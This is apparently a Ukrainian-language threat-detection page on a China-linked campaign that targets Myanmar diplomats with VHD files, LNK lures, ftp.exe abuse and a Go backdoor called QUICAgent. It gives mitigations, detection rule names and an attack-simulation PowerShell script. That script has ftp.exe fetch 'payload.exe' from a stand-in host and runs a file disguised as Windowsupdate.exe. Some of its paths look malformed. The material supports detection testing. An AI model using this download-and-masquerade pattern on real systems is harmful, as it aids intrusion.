Актор з Китаю використовує VHD-файли для атаки на дипломатів М’янми
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Загроза з Китаю націлилася на урядовий персонал М’янми через багатоступеневий ланцюг зараження, що доставляється через файли Virtual Hard Disk (VHD). Кампанія використовує шкідливі LNK-файли для зловживання ftp.exe для відновлення корисного навантаження та впроваджує кастомний бекдор на основі Go, відомий як QUICAgent. Шкідливе програмне забезпечення спирається на Cloudflare Workers для динамічного дозволу C2 і взаємодіє через протокол QUIC.
Розслідування
Команда Seqrite APT проаналізувала зразки VHD, що містять документи-приманки, та виявила шкідливі LNK-файли, замасковані під PDF-файли. Розслідування виявило техніку розділеного завантаження, в якій два файли об’єднуються за допомогою команди copy щоб відновити виконуваний файл. Технічний аналіз імпланта QUICAgent також виявив уникнення пісочниці через повторне хешування SHA-256 та перевірку кастомного TLS-сертифіката.
Пом’якшення
Організації повинні обмежити виконання ненадійних LNK-файлів та контролювати підозрілі дочірні процеси з використанням ftp.exe. Рекомендується строгий контроль використання Virtual Hard Disk (VHD) і моніторинг незвичного мережевого трафіку через порт UDP 443 за допомогою QUIC. Блокування відомих шкідливих кінцевих точок Cloudflare Worker також може порушити механізм дозволу C2 кампанії.
Відповідь
Якщо виявлена активність QUICSILVER, уражені системи слід негайно ізолювати, щоб зупинити подальше вилучення даних та зв’язок з C2. Дослідники повинні перевірити %LOCALAPPDATA% на наявність бінарного файлу Windowsupdate.exe і переглянути папку ‘Автозавантаження’ користувача на наявність SystemIn.lnk. Мережеві журнали також слід проаналізувати на наявність підключень до відомих C2 доменів та IP-адрес, щоб визначити обсяг компрометації.
Потік атаки
Ми все ще оновлюємо цю частину.
Виявлення
Можливий шкідливий файл LNK з подвійним розширенням (через cmdline)
Можливий шкідливий файл з подвійним розширенням (через process_creation)
Можлива операція вручну або скриптова операція була виконана в незвичайних папках (через cmdline)
LOLBAS ftp (через cmdline)
Підозрілі бінарні файли / скрипти в автозапуску (через file_event)
Підозріле виконання з монтуваного диска (через аудит)
Можливе зловживання доменом розробки Cloudflare (через dns)
Індикатори компрометації (HashSha256) для виявлення: Операція QUICSILVER: Китайський актор націлився на дипломатів М’янми через VHD-доставлений Go-Bekdor
Індикатори компрометації (SourceIP) для виявлення: Операція QUICSILVER: Китайський актор націлився на дипломатів М’янми через VHD-доставлений Go-Bekdor
Індикатори компрометації (DestinationIP) для виявлення: Операція QUICSILVER: Китайський актор націлився на дипломатів М’янми через VHD-доставлений Go-Bekdor
Виявлення C2-комунікації QUICAgent [Windows Network Connection]
Підозріле використання ftp.exe та Windowsupdate.exe для виконання шкідливого ПЗ [створення процесів Windows]
Виконання симуляцій
Передумови: перевірка телеметрії та базового тестування повинна бути успішною.
Обґрунтування: У цьому розділі детально описано точне виконання техніки супротивником (TTP), розроблене для запуску правила виявлення. Команди та розповідь МАЮТЬ прямо відображати виявлені TTP та мають на меті генерувати саме ту телеметрію, на яку очікує логіка виявлення. Абстрактні або не пов’язані приклади призведуть до неправильної діагностики.
-
Опис атаки та команди: Супротивник прагне закріпити себе, імітуючи легітимні системні процеси. Спочатку вони використовують
ftp.exeзі скриптовим файлом (-s:) для завантаження шкідливого завантаження, намагаючись злитися з автоматизованими адміністративними завданнями. Одночасно вони імітують розгортання “Windows Update” (перейменованого) для маскування виконання завантаження. Нарешті, вони використовують PowerShell-скрипт, розроблений для створення шкідливого.lnkфайлу для забезпечення стійкості через взаємодію з користувачем. -
Скрипт для регресивного тестування:
# 1. Імітація завантаження через FTP-скрипт (Тригер 1 частина A) $ftpScript = "open ftp.example.com`nuser anonymous anonymous`nget payload.exe`nquit" $ftpScript | Out-File -FilePath "$env:TEMPftp_script.txt" -Encoding ASCII Start-Process "ftp.exe" -ArgumentList "-s:$env:TEMPftp_script.txt" -Wait # 2. Імітація виконання Windowsupdate.exe (Тригер 1 частина B) # Примітка: це передбачає наявність файлу під назвою Windowsupdate.exe або його виклик # Для симуляції ми створимо фіктивний файл та запустимо його New-Item -Path "$env:TEMPWindowsupdate.exe" -ItemType File -Force Start-Process "$env:TEMPWindowsupdate.exe" # 3. Імітація створення LNK через PowerShell (Тригер 2) Start-Process "powershell.exe" -ArgumentList "-Command", "Write-Output 'create_lnk_process_running'" -
Команди для очищення:
# Видалити створені артефакти Remove-Item -Path "$env:TEMPftp_script.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPWindowsupdate.exe" -ErrorAction SilentlyContinue